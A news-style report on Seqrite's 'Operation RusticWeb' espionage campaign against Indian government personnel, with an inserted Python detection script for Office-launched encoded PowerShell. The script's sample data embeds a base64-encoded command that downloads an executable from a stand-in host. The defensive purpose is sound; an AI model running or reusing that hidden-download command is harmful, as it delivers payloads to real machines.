Seqrite has unearthed ‘Operation RusticWeb’, a highly sophisticated cyber-espionage campaign, meticulously orchestrated to target various personnel within the Indian government. While uncovering this cyber-espionage campaign, the researchers at Seqrite Labs, the cybersecurity research and response division of Quick Heal and India’s largest malware detection facility, have highlighted an alarming evolution in the tactics employed by threat actors.
Since October 2023, Seqrite Labs' APT-Team has been diligently investigating the intricacies of Operation RusticWeb, uncovering a multifaceted approach that combines cutting-edge techniques and new-age programming languages. The campaign employs Rust-based malware and encrypted PowerShell commands, demonstrating a strategic shift towards more advanced and evasive methods of exfiltrating confidential documents.
The campaign is initiated with a phishing campaign targeting government personnel. Threat actors have used both compromised and fake domains to host malicious payloads and decoy files; the lures range from IPR forms to fake domains mimicking prestigious organizations like the Army Welfare Education Society (AWES). The decoy files, designed to lure victims into the malicious web, include forms related to the Defence Services Officers Provident Fund and presentations on initiatives with the Ministry of Defence.
Operation RusticWeb uses Rust-based payloads and encrypted PowerShell commands. The threat actors exfiltrate sensitive documents via a web-based service engine, adding a layer of sophistication to their cyber-espionage tactics. The first observed infection chain heavily relied on Rust-based payloads, with a malicious shortcut file triggering an elaborate sequence leading to the exfiltration of sensitive data. The second infection chain, observed in December, deployed maldocs using encrypted PowerShell commands, showcasing the threat actors' versatility and adaptability.
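As an added defender-side example (not code from Seqrite's report), the following Python triage routine flags the maldoc stage described above: PowerShell launched by an Office parent process with an encoded command, whose payload it decodes (base64 over UTF-16LE) for the analyst. The process-creation events, URL and hostnames are constructed for the example, not indicators from the campaign.

```python
import base64
import re

# Constructed sample process-creation events (not from the report): one benign
# PowerShell launch and one where an Office process spawns an encoded command.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + base64.b64encode(
         "Invoke-WebRequest http://example.invalid/p.exe".encode("utf-16-le")).decode()},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Common abbreviations of -EncodedCommand that powershell.exe accepts.
ENCODED_FLAG = re.compile(r"(?i)\s-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # powershell.exe expects base64 of the UTF-16LE encoded script text.
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(event):
    """Score one event: Office parent plus encoded command is the maldoc pattern."""
    if event["image"].lower() != "powershell.exe":
        return None
    decoded = decode_encoded_command(event["cmdline"])
    office_parent = event["parent"].lower() in OFFICE_PARENTS
    if office_parent and decoded is not None:
        return {"severity": "high", "parent": event["parent"], "decoded": decoded}
    if office_parent or decoded is not None:
        return {"severity": "medium", "parent": event["parent"], "decoded": decoded}
    return None

def triage(events):
    """Return the list of alerts for all events that matched a rule."""
    return [a for a in (triage_event(e) for e in events) if a]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```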
The final payload of Operation RusticWeb is a Rust-based malware that operates as a data stealer. This sophisticated malware not only steals files but also collects system information, ensuring an extensive reconnaissance capability. The threat actors employ an anonymous public file-sharing engine, OshiUpload, for data exfiltration, avoiding the conventional use of dedicated command-and-control servers.
Operation RusticWeb is a prime example of threat actors departing from conventional cyber-attack methodologies and adopting newer programming languages such as Golang, Rust, and Nim, which provide cross-platform compatibility and make detection harder. The campaign draws parallels with Pakistan-linked APT groups, specifically Transparent Tribe (APT36) and SideCopy, underlining the possibility of a larger, orchestrated cyber-espionage effort.
In the wake of rapidly evolving cyber threats, Seqrite urges heightened caution and emphasizes the importance of implementing robust cybersecurity measures. The company remains committed to staying at the forefront of cybersecurity research, providing critical insights to safeguard individuals, organizations, and governments against evolving cyber threats.